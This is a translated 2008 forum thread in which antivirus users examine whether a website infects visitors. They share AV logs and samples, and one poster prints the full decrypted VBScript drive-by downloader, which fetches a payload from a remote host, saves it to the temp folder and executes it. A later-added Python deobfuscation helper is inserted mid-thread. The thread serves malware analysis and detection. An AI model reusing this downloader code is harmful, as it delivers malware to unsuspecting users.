Does this website have a virus?


http://www.xbdb.info/

As soon as I went in, my antivirus, F-Secure Client Security 7.10 209, flagged a virus, but other people's Kaspersky and Avast couldn't find anything.

I'm uploading a compressed archive with a screenshot of the virus I caught.

1.rar
(2008-03-04 17:20:59, Size: 115 kB, Downloads: 13)



  • krichard2007 (2008-3-04 20:59:11)

    There is a virus....
    After going in, EQSecure reacted...
    Here is the report...
    2008-03-04 20:52:39    執行應用程序      操作:阻止
    程序路徑:D:\Program Files\Internet Explorer\IEXPLORE.EXE
    檔案路徑:D:\Documents and Settings\Reynaldo Chi Dee Ang\Local Settings\Temp\X7349.com
    觸發規則:所有程序規則->*


    2008-03-04 20:52:49    執行應用程序      操作:阻止
    程序路徑:D:\Program Files\Internet Explorer\IEXPLORE.EXE
    檔案路徑:D:\Documents and Settings\Reynaldo Chi Dee Ang\Local Settings\Temp\X7349.com
    觸發規則:所有程序規則->*

    It automatically downloads something called....
    X7349.com
    ....
    KIS 7.0 Miss....

    The sample is below...
    Everyone test it and see....

    X7349.rar
    (2008-03-04 20:59:11, Size: 143 kB, Downloads: 26)

  • krichard2007 (2008-3-04 21:03:13)

    I still don't know...
    what happens when you click
    X7349.com.....
    Only people who are very confident about their computer should try it.....
  • juijui (2008-3-04 21:07:49)

    After opening it in IE, Avira (the "red umbrella") gave no alert!
  • juijui (2008-3-04 21:16:30)

    On clicking download, Avira reported Virus or unwanted program 'ADSPY/Drop.Boran.I [ADSPY/Drop.Boran.I]'

    Is that file generated after entering the site?

    I opened it in IE and Avira had no reaction at all, and neither did EQ...
  • krichard2007 (2008-3-04 21:25:22)

    Yes....
    After a few seconds......
    I quickly pressed block....
    And it pops up some advertisement windows...
  • 我最好你最了 (2008-3-04 22:02:29)

    Thanks everyone for the help, thank you
  • masterchief (2008-3-05 22:10:23)

    Using Avira I found that hxxp://ec.3527.com/popn_3527_2.js is a malicious file; the iframe inside popn_3527_2.js links to hxxp://a1.65862.com/count.html; the script inside count.html links to hxxp://a1.65862.com/count.gif (encrypted)

    Encrypted code of count.gif (ASCII):

    After decryption, the virus's hiding place is hxxp://ad.65862.com/real.gif

    Avira AntiVir:
    popn_3527_2.js contains detection pattern of the Java script virus JS/Dldr.Boran.1
    real.gif contains detection pattern of the Ad- or Spyware ADSPY/Drop.Boran.I
    count.gif contains detection pattern of the VBS script virus VBS/Dldr.Boran.I
  • a750828 (2008-3-05 23:07:21)

    McAfee miss
  • Wan (2008-3-08 20:36:08)

    Trend Micro reports a known malicious program
    from d:\病毒\X7349.rar,(X7349.com)
    TROJ_SMALL.FQE
  • sun88990 (2008-3-24 15:14:39)

    McAfee miss
  • said411f (2008-3-24 19:09:44)

    555.......

    My LinkScanner ~ avast 4.8 ~ had no reaction at all
  • shen36930 (2008-3-25 00:08:00)

    Upload it to CA, who only know how to analyze, and see
  • home81 (2008-3-27 19:26:24)

    All of the files
    scanned with Kaspersky
    no virus =口=
  • masterchief (2008-4-05 19:20:19)

    Browsing that website now still downloads the malicious program
    Moreover, X7349.com is actually the downloaded real.gif (linked from hxxp://ad.65862.com/), randomly renamed by the malicious code
    VT scan result → http://www.virustotal.com/zh-tw/ ... 016eec1d8429679dbef

    The decrypted content of count.gif (hxxp://a1.65862.com/) is as follows
    On error resume Next
    X1="hxxp://ad.65862.com/real.gif" → URL of the web-delivered malware
    Set X2=document.createElement("obj"&"ect")
    X2.setAttribute "classid","clsid:B"&"D9"&"6C556-65A3-11D0-983A-00C04FC29E36"
    Set X17=X2.createobject("WScript.Shell","")
    X18=X17.RegRead("HKLM\SOFTWARE\adx\Config\Time1")
    X18=X18&X17.RegRead("HKLM\SOFTWARE\real\Config\Time1")
    X18=X18&X17.RegRead("HKLM\SOFTWARE\rising\Rav\")
    X18=X18&X17.RegRead("HKCU\SOFTWARE\Rising\KaKaToolBar\name")
    X18=X18&X17.RegRead("HKLM\SOFTWARE\360safe\Coop\PrePartner")
    X18=X18&X17.RegRead("HKCU\SOFTWARE\Kingsoft\AntiVirus\InstallTime")
    X18=X18&X17.RegRead("HKLM\SOFTWARE\KasperskyLab\AVP6\environment\ProductName")
    If X18="" Then
    X3="M"&"icr"&"osoft.X"&"MLH"&"TTP"
    Set X4=X2.CreateObject(X3,"")
    X5="Ado"
    X6="db."
    X7="Str"
    X8="eam"
    X9=X5&X6&X7&X8
    X10=X9
    set X11=X2.createobject(X10,"")
    X11.type=1
    X12="GET"
    X4.Open X12,X1,False
    X4.Send
    X13="X"&CStr(Int((9999-1000+1)*Rnd+1000))&".com" → code that gives the virus a random name
    set X14=X2.createobject("S"&"cri"&"pting.F"&"ileSy"&"stemObject","")
    set X15=X14.GetSpecialFolder(2)
    X13=X14.BuildPath(X15,X13)
    X11.open
    X11.write X4.responseBody
    X11.savetofile X13,2
    X11.close
    Set X16 = X2.createobject("WScript.Shell","")
    X16.run(X13)
    End If

    From the above content, this malicious program is aimed at Kaspersky, Kingsoft AntiVirus, 360 Safeguard, Rising and similar software.

    [ This post was last edited by masterchief on 2008-4-5 19:27 ]
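The decoded script above builds its ProgIDs from split string literals ("obj"&"ect") and variable chains (X9=X5&X6&X7&X8) so that signature scanners miss them. The Python below is an added triage helper, not code from the thread: it folds those joins, then flags the fetch / write-to-disk / execute combination and extracts the URL and the registry keys probed. The sample script and the example.invalid URL are constructed by me in the style of the decoded count.gif, not the real file.

```python
import re
# Constructed sample in the style of the decoded count.gif script quoted above
# (strings split with & to dodge simple signatures); not the real file.
SAMPLE = r'''X1="hxxp://example.invalid/real.gif"
Set X17=X2.createobject("WScript.Shell","")
X18=X17.RegRead("HKLM\SOFTWARE\KasperskyLab\AVP6\environment\ProductName")
X3="M"&"icr"&"osoft.X"&"MLH"&"TTP"
X5="Ado"
X6="db.Str"&"eam"
X9=X5&X6
set X11=X2.createobject(X9,"")
set X14=X2.createobject("S"&"cri"&"pting.F"&"ileSy"&"stemObject","")
X11.savetofile X13,2
X16.run(X13)
'''

LIT_CONCAT = re.compile(r'"([^"]*)"\s*&\s*"([^"]*)"')
ASSIGN_LIT = re.compile(r'^\s*(\w+)\s*=\s*"([^"]*)"\s*$')
ASSIGN_VARS = re.compile(r'^\s*(\w+)\s*=\s*(\w+(?:\s*&\s*\w+)*)\s*$')
# ProgIDs and calls that together spell "fetch, write to disk, execute".
INDICATORS = ["microsoft.xmlhttp", "adodb.stream", "scripting.filesystemobject",
              "wscript.shell", "savetofile", ".run(", "regread"]

def fold_literals(line):
    while LIT_CONCAT.search(line):  # "a"&"b"&"c" -> "abc"
        line = LIT_CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', line)
    return line

def deobfuscate(script):
    """Fold literal joins, then resolve Xn=Xa&Xb chains built from known strings."""
    env, out = {}, []
    for line in script.splitlines():
        line = fold_literals(line)
        if m := ASSIGN_LIT.match(line):
            env[m.group(1).lower()] = m.group(2)
        elif m := ASSIGN_VARS.match(line):
            parts = [p.strip().lower() for p in m.group(2).split("&")]
            if all(p in env for p in parts):
                env[m.group(1).lower()] = "".join(env[p] for p in parts)
        out.append(line)
    return out, env

def triage(script):
    lines, env = deobfuscate(script)
    text = "\n".join(lines + list(env.values())).lower()
    hits = [i for i in INDICATORS if i in text]
    urls = sorted(v for v in env.values() if v.lower().startswith(("hxxp://", "http://", "https://")))
    keys = re.findall(r'RegRead\("([^"]+)"\)', "\n".join(lines), re.I)
    return {"hits": hits, "urls": urls, "regkeys": keys, "suspicious": len(hits) >= 4}
```

Running triage(SAMPLE) reports all seven indicators, the defanged real.gif URL and the Kaspersky registry key the script checks before deciding whether to drop its payload.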
  • sun88990 (2008-4-18 23:04:30)

    McAfee found nothing
  • Mr.Z (2008-4-19 17:52:58)

    Why post the URL out in the open like that
  • flyJK (2008-4-24 02:56:39)

    Firefox says it is a dangerous site
    so I didn't go in
  • Topus (2008-4-24 05:02:43)

    Access to the data has been denied!
    Warning: A virus or unwanted program has been found in the HTTP Data.

    Requested URL:  http://www.avpclub.ddns.info/discuz/attachment.php?aid=4735
    Information:  Contains detection pattern of the Ad- or Spyware ADSPY/Drop.Boran.I  


    --------------------------------------------------------------------------------
    Generated by AntiVir WebGuard 8.0.13.0, AVE 8.1.0.32, VDF 7.0.3.204
  • Topus (2008-4-24 05:05:37)

    Addendum:
  • 郭政勳 (2008-5-02 14:12:25)

    Avira C edition found nothing, and again no AD